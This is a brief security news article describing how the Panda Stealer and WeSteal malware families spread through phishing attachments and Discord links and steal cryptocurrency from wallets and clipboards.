Panda Stealer and Westeal Malware are Targeting Cryptocurrency Wallets

Over the past few years, several new strains of malware have been created to harness the power of victim's PCs to mine for various types of cryptocurrency.

More recently, some enterprising cybercriminals have decided that it would be easier to just bypass the entire mining phase for the new digital currency that's been all the rage over the past several years, and go right to users' digital wallets, or attack funds temporarily held on computer clipboards.

What Are the Newest Security Threats Against Cryptocurrency?

A new malware strain, dubbed Panda Stealer by researchers, and a cryptocurrency-related malware program named WeSteal are making headlines as they steal copious amounts of cryptocurrency.

Panda Stealer spreads through phishing emails and malicious Discord links. The phishing emails purport to be business quote requests, with an XLSM file attached with macros, that after enabling, downloads a "loader" that executes the main "stealer" app.

If Panda Stealer doesn't get you that way, it may also infect you via an XLS file containing a formula that hides a Powershell command that accesses a program known as paste.ee, an alternative to Pastebin, and then downloads another PowerShell command. After its initiation, Panda Stealer attempts to detect keystrokes, steal addresses, and commandeer other data associated with cryptocurrency transactions and wallets. It has been known to attack cryptocurrencies including Dash, Bytecoin, Litecoin, and Ethereum.

The other new threat, Westeal is the newest incarnation of Wesupply Crypto Stealer, another strain of malicious code that has been available on the dark net since May 2020. According to researchers, Westeal has been available for sale since mid-February 2021.

Westeal website image - Source: ZDnet.com

Westeal seems to be primarily designed to steal Bitcoin and Ethereum as it passes in and out of the victim's wallet via their clipboard. Additionally, people who purchase the Westeal app get access to a web panel to conveniently handle all their nefarious operations, including a "victim tracker panel."

At this time, Palo Alto Networks is claiming that Westeal is immune to major antivirus software. Although the natural evolution of the economy has led many to cryptocurrency, a number of those individuals have less than honorable intentions. These 2 latest schemes prove that criminality continues to move at the speed of technology.